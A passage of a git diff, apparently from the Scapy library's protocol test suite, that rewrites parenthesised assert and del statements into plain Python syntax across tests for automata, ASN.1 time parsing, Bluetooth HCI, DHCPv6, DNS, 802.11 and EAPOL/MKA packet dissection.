"0000 41 30" in result_pl_nzpadding test_nzpadding() @@ -4661,10 +4661,10 @@ def test_conversations(mock_do_graph): plist.extend([IPv6(src="::2", dst="::1")/TCP(sport=i) for i in range(2)]) plist.extend([Ether()/ARP(pdst="127.0.0.1")]) result_conversations = plist.conversations() - assert(len(result_conversations.split('\n')) == 8) - assert(result_conversations.startswith('digraph "conv" {')) - assert("127.0.0.1" in result_conversations) - assert("::1" in result_conversations) + assert len(result_conversations.split('\n')) == 8 + assert result_conversations.startswith('digraph "conv" {') + assert "127.0.0.1" in result_conversations + assert "::1" in result_conversations test_conversations() @@ -4673,7 +4673,7 @@ test_conversations() pl = PacketList([Ether()/IPv6()/ICMPv6EchoRequest(), Ether()/IPv6()/IPv6()]) pl.extend([Ether()/IP()/IP(), Ether()/ARP()]) pl.extend([Ether()/Ether()/IP()]) -assert(len(pl.sessions().keys()) == 5) +assert len(pl.sessions().keys()) == 5 = afterglow() @@ -4686,8 +4686,8 @@ def test_afterglow(mock_do_graph): plist = PacketList([IP(dst="127.0.0.2")/TCP(dport=i) for i in range(2)]) plist.extend([IP(src="127.0.0.2")/TCP(sport=i) for i in range(2)]) result_afterglow = plist.afterglow() - assert(len(result_afterglow.split('\n')) == 19) - assert(result_afterglow.startswith('digraph "afterglow" {')) + assert len(result_afterglow.split('\n')) == 19 + assert result_afterglow.startswith('digraph "afterglow" {') test_afterglow() @@ -4700,7 +4700,7 @@ if PYX: filename = tempfile.mktemp(suffix=".eps") plist = PacketList([IP()/TCP()]) plist.psdump(filename) - assert(os.path.exists(filename)) + assert os.path.exists(filename) os.unlink(filename) = pdfdump() @@ -4712,7 +4712,7 @@ if PYX: filename = tempfile.mktemp(suffix=".pdf") plist = PacketList([IP()/TCP()]) plist.pdfdump(filename) - assert(os.path.exists(filename)) + assert os.path.exists(filename) os.unlink(filename) = svgdump() @@ -4724,7 +4724,7 @@ if PYX and not six.PY2: filename = tempfile.mktemp(suffix=".svg") plist = PacketList([IP()/TCP()]) plist.svgdump(filename) - assert(os.path.exists(filename)) + assert os.path.exists(filename) os.unlink(filename) = __getstate__ / __setstate__ (used by pickle) @@ -4763,9 +4763,9 @@ with open(version_filename, "w") as fd: import mock with mock.patch("scapy._version_from_git_describe") as version_mocked: version_mocked.side_effect = Exception() - assert(scapy._version() == version) + assert scapy._version() == version os.unlink(version_filename) - assert(scapy._version() == "unknown.version") + assert scapy._version() == "unknown.version" = UTscapy HTML output diff --git a/test/scapy/automaton.uts b/test/scapy/automaton.uts index 2f6dbdf140f..bc103f3126d 100644 --- a/test/scapy/automaton.uts +++ b/test/scapy/automaton.uts @@ -44,16 +44,16 @@ class ATMT1(Automaton): a=ATMT1(init="a", ll=lambda: None, recvsock=lambda: None) r = a.run() r -assert(r == 'aabaaababaaabaaababab') +assert r == 'aabaaababaaabaaababab' r = a.result r -assert(r == 'aabaaababaaabaaababab') +assert r == 'aabaaababaaabaaababab' a = ATMT1(init="b", ll=lambda: None, recvsock=lambda: None) r = a.run() r -assert(r == 'babababababababababababababab') +assert r == 'babababababababababababababab' r = a.result -assert(r == 'babababababababababababababab') +assert r == 'babababababababababababababab' = Simple automaton stuck test ~ automaton @@ -76,19 +76,19 @@ class ATMT2(ATMT1): a=ATMT2(init="a", ll=lambda: None, recvsock=lambda: None) r = a.run() r -assert(r == 'ccccccacabacccacababacccccacabacccacababab') +assert r == 'ccccccacabacccacababacccccacabacccacababab' r = a.result r -assert(r == 'ccccccacabacccacababacccccacabacccacababab') +assert r == 'ccccccacabacccacababacccccacabacccacababab' a=ATMT2(init="b", ll=lambda: None, recvsock=lambda: None) r = a.run() r -assert(r == 'cccccbaccbabaccccbaccbabab') +assert r == 'cccccbaccbabaccccbaccbabab' r = a.result r -assert(r == 'cccccbaccbabaccccbaccbabab') +assert r == 'cccccbaccbabaccccbaccbabab' = Automaton condition overloading @@ -103,18 +103,18 @@ class ATMT3(ATMT2): a=ATMT3(init="a", ll=lambda: None, recvsock=lambda: None) r = a.run() r -assert(r == 'cccccacabdacccacabdabda') +assert r == 'cccccacabdacccacabdabda' r = a.result r -assert(r == 'cccccacabdacccacabdabda') +assert r == 'cccccacabdacccacabdabda' a=ATMT3(init="b", ll=lambda: None, recvsock=lambda: None) r = a.run() r -assert(r == 'cccccbdaccbdabdaccccbdaccbdabdab') +assert r == 'cccccbdaccbdabdaccccbdaccbdabdab' r = a.result r -assert(r == 'cccccbdaccbdabdaccccbdaccbdabdab') +assert r == 'cccccbdaccbdabdaccccbdaccbdabdab' = Automaton action overloading @@ -127,17 +127,17 @@ class ATMT4(ATMT3): a=ATMT4(init="a", ll=lambda: None, recvsock=lambda: None) r = a.run() r -assert(r == 'cccccacabdacccacabdabda') +assert r == 'cccccacabdacccacabdabda' r = a.result r -assert(r == 'ecccccacabdacccacabdabdae') +assert r == 'ecccccacabdacccacabdabdae' a=ATMT4(init="b", ll=lambda: None, recvsock=lambda: None) r = a.run() r -assert(r == 'cccccbdaccbdabdaccccbdaccbdabdab') +assert r == 'cccccbdaccbdabdaccccbdaccbdabdab' r = a.result r -assert(r == 'ecccccbdaccbdabdaccccbdaccbdabdabe') +assert r == 'ecccccbdaccbdabdaccccbdaccbdabdabe' = Automaton priorities @@ -172,7 +172,7 @@ class ATMT5(Automaton): a=ATMT5(ll=lambda: None, recvsock=lambda: None) r = a.run() r -assert(r == 'Jupiter') +assert r == 'Jupiter' = Automaton test same action for many conditions ~ automaton @@ -208,12 +208,12 @@ class ATMT6(Automaton): a=ATMT6(ll=lambda: None, recvsock=lambda: None) r = a.run() -assert(r == 'Mercury') +assert r == 'Mercury' a.restart() r = a.run() r -assert(r == 'Mercury') +assert r == 'Mercury' = Automaton test io event ~ automaton @@ -246,7 +246,7 @@ r a.io.tst.send(r) r = a.run() r -assert(r == "Saturn") +assert r == "Saturn" a.restart() a.run(wait=False) @@ -256,7 +256,7 @@ r a.io.tst.send(r) r = a.run() r -assert(r == "Saturn") +assert r == "Saturn" = Automaton test io event from external fd ~ automaton @@ -300,7 +300,7 @@ writeOn(w, b"nu") r = a.run() r -assert(r == b"Uranus") +assert r == b"Uranus" a.restart() a.run(wait=False) @@ -308,7 +308,7 @@ writeOn(w, b"ra") writeOn(w, b"nu") r = a.run() r -assert(r == b"Uranus") +assert r == b"Uranus" = Automaton test interception_points, and restart ~ automaton @@ -331,12 +331,12 @@ class ATMT9(Automaton): a=ATMT9(debug=5, ll=lambda: None, recvsock=lambda: None) r = a.run() r -assert(r == "VENUs") +assert r == "VENUs" a.restart() r = a.run() r -assert(r == "VENUs") +assert r == "VENUs" a.restart() a.BEGIN.intercepts() @@ -350,7 +350,7 @@ while True: r = x r -assert(r == "Venus") +assert r == "Venus" = Automaton timer function ~ run timers @@ -458,7 +458,7 @@ if LINUX: import os IPTABLE_RULE = "iptables -%c INPUT -s %s -p tcp --sport 80 -j DROP" # Drop packets from SECDEV_IP4 - assert(os.system(IPTABLE_RULE % ('A', SECDEV_IP4)) == 0) + assert os.system(IPTABLE_RULE % ('A', SECDEV_IP4)) == 0 load_layer("http") @@ -497,5 +497,5 @@ if LINUX: finally: if LINUX: # Remove the iptables rule - assert(os.system(IPTABLE_RULE % ('D', SECDEV_IP4)) == 0) + assert os.system(IPTABLE_RULE % ('D', SECDEV_IP4)) == 0 diff --git a/test/scapy/layers/asn1.uts b/test/scapy/layers/asn1.uts index 3ead0b8b40b..9fa0bad0f44 100644 --- a/test/scapy/layers/asn1.uts +++ b/test/scapy/layers/asn1.uts @@ -22,9 +22,9 @@ repr(ASN1_GENERALIZED_TIME("19991231235959")).startswith("1999-12-31 23:59:59 <" = with microseconds repr(ASN1_GENERALIZED_TIME("19991231235959.999")).startswith("1999-12-31 23:59:59.999 <") = with microseconds (invalid) -assert("invalid" in repr(ASN1_GENERALIZED_TIME("1999123125959.99"))) -assert("invalid" in repr(ASN1_GENERALIZED_TIME("1999123125959.99x"))) -assert("invalid" in repr(ASN1_GENERALIZED_TIME("1999123125959.9999"))) +assert "invalid" in repr(ASN1_GENERALIZED_TIME("1999123125959.99")) +assert "invalid" in repr(ASN1_GENERALIZED_TIME("1999123125959.99x")) +assert "invalid" in repr(ASN1_GENERALIZED_TIME("1999123125959.9999")) + ASN.1 Generalized Time (Zulu) @@ -51,8 +51,8 @@ repr(ASN1_GENERALIZED_TIME("19991231235959.999+0100")).startswith("1999-12-31 23 = offset negative repr(ASN1_GENERALIZED_TIME("19991231235959-2359")).startswith("1999-12-31 23:59:59 -2359 <") = offset invalid (offset >= 24h) -assert("invalid" in repr(ASN1_GENERALIZED_TIME("19991231235959-2400"))) -assert("invalid" in repr(ASN1_GENERALIZED_TIME("19991231235959+2400"))) +assert "invalid" in repr(ASN1_GENERALIZED_TIME("19991231235959-2400")) +assert "invalid" in repr(ASN1_GENERALIZED_TIME("19991231235959+2400")) + ASN.1 UTC Time @@ -84,7 +84,7 @@ ASN1_GENERALIZED_TIME("19991231235959").datetime == datetime(1999, 12, 31, 23, 5 = datetime assignment x = ASN1_GENERALIZED_TIME("19991231235959.999") x.datetime = datetime(2020, 12, 31) -assert(x.val == "20201231000000") +assert x.val == "20201231000000" x.datetime = x.datetime.replace(tzinfo=timezone.utc) x.val == "20201231000000Z" = datetime construction diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 46d4f931abb..76d1f959422 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -57,33 +57,33 @@ assert L2CAP_InfoReq in pkt # Request data cmd = HCI_Hdr(hex_bytes("010d2019600060000001123456677890001800280000002a0000000000")) -assert(HCI_Cmd_LE_Create_Connection in cmd) -assert(cmd[HCI_Cmd_LE_Create_Connection].paddr == '90:78:67:56:34:12') -assert(cmd[HCI_Cmd_LE_Create_Connection].patype == 1) +assert HCI_Cmd_LE_Create_Connection in cmd +assert cmd[HCI_Cmd_LE_Create_Connection].paddr == '90:78:67:56:34:12' +assert cmd[HCI_Cmd_LE_Create_Connection].patype == 1 # Response data pending = HCI_Hdr(hex_bytes("040f0400020d20")) -assert(pending.answers(cmd)) +assert pending.answers(cmd) complete = HCI_Hdr(hex_bytes("043e1301020000000112345667789000000000000000")) -assert(HCI_LE_Meta_Connection_Complete in complete) -assert(complete[HCI_LE_Meta_Connection_Complete].paddr == '90:78:67:56:34:12') -assert(complete.answers(cmd)) +assert HCI_LE_Meta_Connection_Complete in complete +assert complete[HCI_LE_Meta_Connection_Complete].paddr == '90:78:67:56:34:12' +assert complete.answers(cmd) # Invalid combinations -assert(not cmd.answers(cmd)) -assert(not pending.answers(pending)) -assert(not complete.answers(complete)) -assert(not pending.answers(complete)) -assert(not complete.answers(pending)) +assert not cmd.answers(cmd) +assert not pending.answers(pending) +assert not complete.answers(complete) +assert not pending.answers(complete) +assert not complete.answers(pending) = LE Create Connection Cancel # Craft a request... expected_cmd_raw_data = hex_bytes("010e2000") cmd = HCI_Hdr() / HCI_Command_Hdr() / HCI_Cmd_LE_Create_Connection_Cancel() -assert(expected_cmd_raw_data == raw(cmd)) -assert(raw(HCI_Hdr(expected_cmd_raw_data)) == expected_cmd_raw_data) +assert expected_cmd_raw_data == raw(cmd) +assert raw(HCI_Hdr(expected_cmd_raw_data)) == expected_cmd_raw_data other_raw_data = hex_bytes("01060403341213") other_cmd = HCI_Hdr(other_raw_data) @@ -97,18 +97,18 @@ for p in ( # For debugging res # Check that the response packet thinks it is an answer to the request - assert(res.answers(cmd)) + assert res.answers(cmd) # Check that it self isn't a match - assert(not res.answers(res)) + assert not res.answers(res) # Check that another request wouldn't match - assert(not res.answers(other_cmd)) + assert not res.answers(other_cmd) "OK!" = Disconnect expected_cmd_raw_data = hex_bytes("01060403341213") cmd_raw_data = raw(HCI_Hdr() / HCI_Command_Hdr() / HCI_Cmd_Disconnect(handle=0x1234)) -assert(expected_cmd_raw_data == cmd_raw_data) +assert expected_cmd_raw_data == cmd_raw_data = LE Connection Update Command expected_cmd_raw_data = hex_bytes("0113200e47000a00140001003c000100ffff") @@ -116,17 +116,17 @@ cmd_raw_data = raw( HCI_Hdr() / HCI_Command_Hdr() / HCI_Cmd_LE_Connection_Update( handle=0x47, min_interval=10, max_interval=20, latency=1, timeout=60, min_ce=1, max_ce=0xffff)) -assert(expected_cmd_raw_data == cmd_raw_data) +assert expected_cmd_raw_data == cmd_raw_data + HCI Events = LE Connection Update Event evt_raw_data = hex_bytes("043e0a03004800140001003c00") evt_pkt = HCI_Hdr(evt_raw_data) -assert(evt_pkt[HCI_LE_Meta_Connection_Update_Complete].handle == 0x48) -assert(evt_pkt[HCI_LE_Meta_Connection_Update_Complete].interval == 20) -assert(evt_pkt[HCI_LE_Meta_Connection_Update_Complete].latency == 1) -assert(evt_pkt[HCI_LE_Meta_Connection_Update_Complete].timeout == 60) +assert evt_pkt[HCI_LE_Meta_Connection_Update_Complete].handle == 0x48 +assert evt_pkt[HCI_LE_Meta_Connection_Update_Complete].interval == 20 +assert evt_pkt[HCI_LE_Meta_Connection_Update_Complete].latency == 1 +assert evt_pkt[HCI_LE_Meta_Connection_Update_Complete].timeout == 60 + Bluetooth LE Advertising / Scan Response Data Parsing @@ -137,10 +137,10 @@ ad_report_raw_data = \ "506562626c652054696d65204c452037314536020a0cde") scapy_packet = HCI_Hdr(ad_report_raw_data) -assert(scapy_packet[EIR_Flags].flags == 0x02) -assert(scapy_packet[EIR_CompleteList16BitServiceUUIDs].svc_uuids == [0xfed9]) -assert(scapy_packet[EIR_CompleteLocalName].local_name == b'Pebble Time LE 71E6') -assert(scapy_packet[EIR_TX_Power_Level].level == 12) +assert scapy_packet[EIR_Flags].flags == 0x02 +assert scapy_packet[EIR_CompleteList16BitServiceUUIDs].svc_uuids == [0xfed9] +assert scapy_packet[EIR_CompleteLocalName].local_name == b'Pebble Time LE 71E6' +assert scapy_packet[EIR_TX_Power_Level].level == 12 = Parse EIR_Manufacturer_Specific_Data @@ -149,8 +149,8 @@ scan_resp_raw_data = \ "3134374432343631fc00030c0000de") scapy_packet = HCI_Hdr(scan_resp_raw_data) -assert(raw(scapy_packet[EIR_Manufacturer_Specific_Data].payload) == b'\x00_B31147D2461\xfc\x00\x03\x0c\x00\x00') -assert(scapy_packet[EIR_Manufacturer_Specific_Data].company_id == 0x154) +assert raw(scapy_packet[EIR_Manufacturer_Specific_Data].payload) == b'\x00_B31147D2461\xfc\x00\x03\x0c\x00\x00' +assert scapy_packet[EIR_Manufacturer_Specific_Data].company_id == 0x154 = Parse EIR_Manufacturer_Specific_Data with magic diff --git a/test/scapy/layers/dhcp6.uts b/test/scapy/layers/dhcp6.uts index 6b0b90fcfa7..4ae3549891b 100644 --- a/test/scapy/layers/dhcp6.uts +++ b/test/scapy/layers/dhcp6.uts @@ -1174,14 +1174,14 @@ a.optcode == 66 and a.optlen == 22 and len(a.relaysupplied) == 1 and isinstance( = Basic build & dissect s = raw(DHCP6OptClientLinkLayerAddr()) -assert(s == b"\x00O\x00\x08\x00\x01\x00\x00\x00\x00\x00\x00") +assert s == b"\x00O\x00\x08\x00\x01\x00\x00\x00\x00\x00\x00" p = DHCP6OptClientLinkLayerAddr(s) -assert(p.clladdr == "00:00:00:00:00:00") +assert p.clladdr == "00:00:00:00:00:00" r = b"\x00O\x00\x08\x00\x01\x00\x01\x02\x03\x04\x05" p = DHCP6OptClientLinkLayerAddr(r) -assert(p.clladdr == "00:01:02:03:04:05") +assert p.clladdr == "00:01:02:03:04:05" ############ @@ -1190,15 +1190,15 @@ assert(p.clladdr == "00:01:02:03:04:05") = Basic build & dissect s = raw(DHCP6OptMudUrl()) -assert(s == b"\x00p\x00\x00") +assert s == b"\x00p\x00\x00" p = DHCP6OptMudUrl(s) -assert(p.mudstring == b"") +assert p.mudstring == b"" r = b'\x00p\x00\x13https://example.org' p = DHCP6OptMudUrl(r) -assert(p.mudstring == b"https://example.org") -assert(p.optlen == 19) +assert p.mudstring == b"https://example.org" +assert p.optlen == 19 ############ @@ -1207,10 +1207,10 @@ assert(p.optlen == 19) = Basic build & dissect s = raw(DHCP6OptVSS()) -assert(s == b"\x00D\x00\x01\xff") +assert s == b"\x00D\x00\x01\xff" p = DHCP6OptVSS(s) -assert(p.type == 255) +assert p.type == 255 ############ diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index f80f2f8202b..7d40d648506 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -24,15 +24,15 @@ dns_ans.show2() dns_ans[DNS].an.show() dns_ans2 = IP(raw(dns_ans)) DNS in dns_ans2 -assert(raw(dns_ans2) == raw(dns_ans)) +assert raw(dns_ans2) == raw(dns_ans) dns_ans2.qd.qname = "www.secdev.org." * We need to recalculate these values -del(dns_ans2[IP].len) -del(dns_ans2[IP].chksum) -del(dns_ans2[UDP].len) -del(dns_ans2[UDP].chksum) -assert(b"\x03www\x06secdev\x03org\x00" in raw(dns_ans2)) -assert(DNS in IP(raw(dns_ans2))) +del dns_ans2[IP].len +del dns_ans2[IP].chksum +del dns_ans2[UDP].len +del dns_ans2[UDP].chksum +assert b"\x03www\x06secdev\x03org\x00" in raw(dns_ans2) +assert DNS in IP(raw(dns_ans2)) assert raw(DNSRR(type='A', rdata='1.2.3.4')) == b'\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x04\x01\x02\x03\x04' * DNS over UDP diff --git a/test/scapy/layers/dns_dnssec.uts b/test/scapy/layers/dns_dnssec.uts index 769c059138a..631f7237921 100644 --- a/test/scapy/layers/dns_dnssec.uts +++ b/test/scapy/layers/dns_dnssec.uts @@ -141,6 +141,6 @@ raw(t) == b"\nSAMPLE-ALG\x07EXAMPLE\x00\x00\xfa\x00\x01\x00\x00\x00\x00\x00\x1b\ = TimeField methods packed_data = b"\x00\x002\xe4\x07\x00" -assert(TimeSignedField("", 0).i2m("", 853804800) == packed_data) -assert(TimeSignedField("", 0).m2i("", packed_data) == 853804800) -assert(TimeSignedField("", 0).i2repr("", 853804800) == "Tue Jan 21 00:00:00 1997") +assert TimeSignedField("", 0).i2m("", 853804800) == packed_data +assert TimeSignedField("", 0).m2i("", packed_data) == 853804800 +assert TimeSignedField("", 0).i2repr("", 853804800) == "Tue Jan 21 00:00:00 1997" diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index 41469d28903..7bed426a9f2 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -473,10 +473,10 @@ conf.crypto_valid = bck_conf_crypto_valid conf.wepkey = "Fobar" r = raw(Dot11WEP()/LLC()/SNAP()/IP()/TCP(seq=12345678)) r -assert(r == b'\x00\x00\x00\x00\xe3OjYLw\xc3x_%\xd0\xcf\xdeu-\xc3pH#\x1eK\xae\xf5\xde\xe7\xb8\x1d,\xa1\xfe\xe83\xca\xe1\xfe\xbd\xfe\xec\x00)T`\xde.\x93Td\x95C\x0f\x07\xdd') +assert r == b'\x00\x00\x00\x00\xe3OjYLw\xc3x_%\xd0\xcf\xdeu-\xc3pH#\x1eK\xae\xf5\xde\xe7\xb8\x1d,\xa1\xfe\xe83\xca\xe1\xfe\xbd\xfe\xec\x00)T`\xde.\x93Td\x95C\x0f\x07\xdd' p = Dot11WEP(r) p -assert(TCP in p and p[TCP].seq == 12345678) +assert TCP in p and p[TCP].seq == 12345678 = RadioTap - dissection & build data = b'\x00\x008\x00k\x084\x00oo\x0f\x98\x00\x00\x00\x00\x10\x00\x99\x16@\x01\xc5\xa1\x01\x00\x00\x00@\x01\x02\x00\x99\x16\x9d"\x05\x0b\x00\x00\x00\x00\x00\x00\xff\x01\x16\x01\x82\x00\x00\x00\x01\x00\x00\x00\x88\x020\x00\xb8\xe8VB_\xb2\x82*\xa8Uq\x15\xf0\x9f\xc2\x11\x16dP\xb0\x00\x00\xaa\xaa\x03\x00\x00\x00\x08\x00E\x00\x00GC\xad@\x007\x11\x97;\xd0C\xde{\xac\x10\r\xee\x005\xed\xec\x003\xd5/\xfc\\\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00\tlocalhost\x00\x00\x01\x00\x01\xc0\x0c\x00\x01\x00\x01\x00\t:\x80\x00\x04\x7f\x00\x00\x01\xcdj\x88]' diff --git a/test/scapy/layers/eap.uts b/test/scapy/layers/eap.uts index 4c2f14aa9d2..69b5b1b81a0 100644 --- a/test/scapy/layers/eap.uts +++ b/test/scapy/layers/eap.uts @@ -13,23 +13,23 @@ raw(EAPOL(version = 3, type = 5)) == b'\x03\x05\x00\x00' = EAPOL - Dissection (1) s = b'\x03\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 1) -assert(eapol.len == 0) +assert eapol.version == 3 +assert eapol.type == 1 +assert eapol.len == 0 = EAPOL - Dissection (2) s = b'\x03\x00\x00\x05\x01\x01\x00\x05\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 0) -assert(eapol.len == 5) +assert eapol.version == 3 +assert eapol.type == 0 +assert eapol.len == 5 = EAPOL - Dissection (3) s = b'\x03\x00\x00\x0e\x02\x01\x00\x0e\x01anonymous\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 0) -assert(eapol.len == 14) +assert eapol.version == 3 +assert eapol.type == 0 +assert eapol.len == 14 = EAPOL - Dissection (4) req = EAPOL(b'\x03\x00\x00\x05\x01\x01\x00\x05\x01') @@ -39,18 +39,18 @@ ans.answers(req) = EAPOL - Dissection (5) s = b'\x02\x00\x00\x06\x01\x01\x00\x06\r ' eapol = EAPOL(s) -assert(eapol.version == 2) -assert(eapol.type == 0) -assert(eapol.len == 6) -assert(eapol.haslayer(EAP_TLS)) +assert eapol.version == 2 +assert eapol.type == 0 +assert eapol.len == 6 +assert eapol.haslayer(EAP_TLS) = EAPOL - Dissection (6) s = b'\x03\x00\x00<\x02\x9e\x00<+\x01\x16\x03\x01\x001\x01\x00\x00-\x03\x01dr1\x93ZS\x0en\xad\x1f\xbaH\xbb\xfe6\xe6\xd0\xcb\xec\xd7\xc0\xd7\xb9\xa5\xc9\x0c\xfd\x98o\xa7T \x00\x00\x04\x004\x00\x00\x01\x00\x00\x00' eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 0) -assert(eapol.len == 60) -assert(eapol.haslayer(EAP_FAST)) +assert eapol.version == 3 +assert eapol.type == 0 +assert eapol.len == 60 +assert eapol.haslayer(EAP_FAST) ############ @@ -61,76 +61,76 @@ assert(eapol.haslayer(EAP_FAST)) eapol = None s = b'\x03\x05\x00T\x01\xff\xf0<\x00Bh\xa8\x1e\x03\x00\n\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x01\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xff\x00\x00\x10\xe5\xf5j\x86V\\\xb1\xcc\xa9\xb95\x04m*Cj' eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 5) -assert(eapol.len == 84) -assert(eapol.haslayer(MKAPDU)) -assert(eapol[MKAPDU].basic_param_set.actor_member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7") -assert(eapol[MKAPDU].haslayer(MKAICVSet)) -assert(eapol[MKAPDU][MKAICVSet].icv == b"\xe5\xf5j\x86V\\\xb1\xcc\xa9\xb95\x04m*Cj") +assert eapol.version == 3 +assert eapol.type == 5 +assert eapol.len == 84 +assert eapol.haslayer(MKAPDU) +assert eapol[MKAPDU].basic_param_set.actor_member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7" +assert eapol[MKAPDU].haslayer(MKAICVSet) +assert eapol[MKAPDU][MKAICVSet].icv == b"\xe5\xf5j\x86V\\\xb1\xcc\xa9\xb95\x04m*Cj" = EAPOL-MKA - With Potential Peer List parameter set - Dissection eapol = None s = b'\x03\x05\x00h\x01\x10\xe0<\xccN$\xc4\xf7\x7f\x00\x80q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00}\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x02\x00\x00\x10\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x01\xff\x00\x00\x105\x01\xdc)\xfd\xd1\xff\xd55\x9c_o\xc9\x9c\xca\xc0' eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 5) -assert(eapol.len == 104) -assert(eapol.haslayer(MKAPDU)) -assert(eapol[MKAPDU].basic_param_set.actor_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol.haslayer(MKAPotentialPeerListParamSet)) -assert(eapol[MKAPDU][MKAPotentialPeerListParamSet].member_id_message_num[0].member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7") -assert(eapol[MKAPDU].haslayer(MKAICVSet)) -assert(eapol[MKAPDU][MKAICVSet].icv == b"5\x01\xdc)\xfd\xd1\xff\xd55\x9c_o\xc9\x9c\xca\xc0") +assert eapol.version == 3 +assert eapol.type == 5 +assert eapol.len == 104 +assert eapol.haslayer(MKAPDU) +assert eapol[MKAPDU].basic_param_set.actor_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6" +assert eapol.haslayer(MKAPotentialPeerListParamSet) +assert eapol[MKAPDU][MKAPotentialPeerListParamSet].member_id_message_num[0].member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7" +assert eapol[MKAPDU].haslayer(MKAICVSet) +assert eapol[MKAPDU][MKAICVSet].icv == b"5\x01\xdc)\xfd\xd1\xff\xd55\x9c_o\xc9\x9c\xca\xc0" = EAPOL-MKA - With Live Peer List parameter set - Dissection eapol = None s = b"\x03\x05\x00h\x01\xffp<\x00Bh\xa8\x1e\x03\x00\n\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x02\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x01\x00\x00\x10q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x80\xff\x00\x00\x10\xf4\xa1d\x18\tD\xa2}\x8e'\x0c/\xda,\xea\xb7" eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 5) -assert(eapol.len == 104) -assert(eapol.haslayer(MKAPDU)) -assert(eapol[MKAPDU].basic_param_set.actor_member_id == b'\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7') -assert(eapol.haslayer(MKALivePeerListParamSet)) -assert(eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol[MKAPDU].haslayer(MKAICVSet)) -assert(eapol[MKAPDU][MKAICVSet].icv == b"\xf4\xa1d\x18\tD\xa2}\x8e'\x0c/\xda,\xea\xb7") +assert eapol.version == 3 +assert eapol.type == 5 +assert eapol.len == 104 +assert eapol.haslayer(MKAPDU) +assert eapol[MKAPDU].basic_param_set.actor_member_id == b'\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7' +assert eapol.haslayer(MKALivePeerListParamSet) +assert eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6" +assert eapol[MKAPDU].haslayer(MKAICVSet) +assert eapol[MKAPDU][MKAICVSet].icv == b"\xf4\xa1d\x18\tD\xa2}\x8e'\x0c/\xda,\xea\xb7" = EAPOL-MKA - With SAK Use parameter set - Dissection eapol = None s = b'\x03\x05\x00\x94\x01\xffp<\x00Bh\xa8\x1e\x03\x00\n\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x03\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x03\x10\x00(q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x01\x00\x00\x00\x00q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x10q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x83\xff\x00\x00\x10OF\x84\xf1@%\x95\xe6Fw9\x1a\xfa\x03(\xae' eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 5) -assert(eapol.len == 148) -assert(eapol.haslayer(MKAPDU)) -assert(eapol[MKAPDU].basic_param_set.actor_member_id == b'\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7') -assert(eapol.haslayer(MKASAKUseParamSet)) 